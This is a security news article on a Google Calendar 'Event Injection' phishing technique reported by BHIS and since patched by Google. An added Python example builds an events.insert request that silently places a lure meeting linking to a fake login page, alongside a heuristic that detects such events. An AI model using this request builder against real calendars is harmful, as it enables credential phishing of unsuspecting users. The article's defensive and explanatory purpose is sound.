Alongside Gmail and Google Drive, Google offers Google Calendar, a service for scheduling meetings, events and tasks. Event reminders can be delivered by email and by push notification, and Gmail has a function that automatically adds events found in the body of a message to the Calendar. Researchers at Black Hills Information Security (BHIS) discovered an interesting weakness that lets an attacker bypass that email step: using the MailSniper tool, an event can be placed directly in a victim's calendar without any message being sent. The researchers call the technique Event Injection and say it opens a new avenue for phishing.
According to the researchers, if the victim's Google account is linked to their phone, an attacker can generate an event notification that appears directly on the device, with no email involved. In their experiment, the researchers created an event for a supposed company-wide meeting starting in 10 minutes. The event body contained a link to an "agenda" that every employee was expected to read; in reality the link led to a fake Google login page that asked users to enter their credentials to access the document. The researchers report that the method was very effective.
To exploit the issue, BHIS modified MailSniper, adding several new modules. The first mode of operation (Invoke-InjectGEvent) assumes the attacker already holds credentials for a Google account; the second (Invoke-InjectGEventAP) connects directly to the Google API. A detailed description of both methods is available in the researchers' blog.
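As an added illustration (this is not BHIS's code and not part of MailSniper), the Python below builds the Google Calendar API v3 events.insert request that an API-based injection of the kind Invoke-InjectGEventAP performs implies, and pairs it with a defensive check that a user's calendar feed could be run through. The query parameter sendUpdates=none (the successor of sendNotifications=false) is Google's documented way to suppress the invitation email. The lure text, the addresses and hosts, the sample events and the detection thresholds are all constructed for this example; nothing is sent, the function only returns the URL and JSON body.

```python
"""Event-injection request builder plus a detection heuristic (added example)."""
from datetime import datetime, timedelta, timezone
from urllib.parse import urlencode
import re

CALENDAR_API = "https://www.googleapis.com/calendar/v3"
# Fixed "current time" so the example is reproducible offline (constructed).
NOW = datetime(2017, 10, 10, 12, 0, tzinfo=timezone.utc)


def build_injection_request(victim_email, lure_url, now=NOW):
    """Return (url, body) for an events.insert call on the attacker's own
    primary calendar. The victim is an attendee; with the pre-fix default
    "automatically add invitations" the event lands in their calendar, and
    sendUpdates=none suppresses the invitation email. The popup on the
    victim's phone comes from their own default reminder settings, so no
    reminder is set here (the reminders field is per calendar copy)."""
    start = now + timedelta(minutes=10)          # "starts in 10 minutes" lure
    body = {
        "summary": "All-hands meeting",            # constructed lure text
        "description": f"Agenda (required reading): {lure_url}",
        "start": {"dateTime": start.isoformat()},
        "end": {"dateTime": (start + timedelta(minutes=30)).isoformat()},
        "attendees": [{"email": victim_email}],
    }
    url = f"{CALENDAR_API}/calendars/primary/events?{urlencode({'sendUpdates': 'none'})}"
    return url, body


URL_RE = re.compile(r"https?://([^/\s]+)")


def _trusted(host, trusted_domains):
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in trusted_domains)


def flag_suspicious_events(events, trusted_domains, now=NOW, lead_minutes=30):
    """Return ids of events matching the injection pattern: organizer outside
    the trusted domains, starting within lead_minutes, and a description that
    links to a host outside the trusted domains. Thresholds are assumptions."""
    flagged = []
    for ev in events:
        organizer = ev.get("organizer", {}).get("email", "")
        org_domain = organizer.rsplit("@", 1)[-1].lower()
        start = datetime.fromisoformat(ev["start"]["dateTime"])
        minutes_out = (start - now).total_seconds() / 60
        external_links = [h for h in URL_RE.findall(ev.get("description", ""))
                          if not _trusted(h, trusted_domains)]
        if (org_domain not in trusted_domains
                and 0 <= minutes_out <= lead_minutes
                and external_links):
            flagged.append(ev["id"])
    return flagged


# Constructed sample of what a calendar events.list feed might return.
SAMPLE_EVENTS = [
    {"id": "evt-1", "organizer": {"email": "hr@example.com"},
     "start": {"dateTime": "2017-10-10T12:10:00+00:00"},
     "description": "Agenda: https://intranet.example.com/hr"},
    {"id": "evt-2", "organizer": {"email": "attacker@example.net"},
     "start": {"dateTime": "2017-10-10T12:10:00+00:00"},
     "description": "Agenda (required reading): https://accounts-google.login-example.test/agenda"},
    {"id": "evt-3", "organizer": {"email": "vendor@partner.example.org"},
     "start": {"dateTime": "2017-10-12T09:00:00+00:00"},
     "description": "Quarterly review https://partner.example.org/deck"},
]

if __name__ == "__main__":
    url, body = build_injection_request("victim@example.com",
                                        "https://accounts-google.login-example.test/agenda")
    print(url)
    print(body)
    print(flag_suspicious_events(SAMPLE_EVENTS, {"example.com"}))
```

The detection side is deliberately simple: short notice plus an external organizer plus an external link is the shape of the lure the researchers describe, and any one of those signals alone would produce too much noise on a real calendar.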
The researchers reported the issue to Google on October 9 of this year. On October 17 the company released an update adding settings that prevent events from being inserted into a user's Calendar in this way.
MailSniper is a tool for searching corporate or personal mailboxes for specific terms (passwords, internal information, network architecture details, etc.). It can also be used by Microsoft Exchange administrators to view the mailbox of any user in the domain.